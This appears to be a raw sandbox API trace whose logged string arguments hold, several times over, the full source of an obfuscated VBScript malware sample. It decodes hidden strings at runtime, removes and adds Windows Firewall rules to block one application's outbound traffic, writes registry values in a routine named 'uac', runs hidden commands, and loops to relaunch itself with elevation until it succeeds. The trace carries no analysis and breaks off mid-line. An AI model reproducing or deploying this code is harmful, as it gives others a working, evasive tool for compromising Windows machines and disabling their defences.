bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.293] wcsncmp (_String1="= \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0226.293] wcsncmp (_String1=" \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.293] wcsncmp (_String1="\"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.293] wcsncmp (_String1="\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 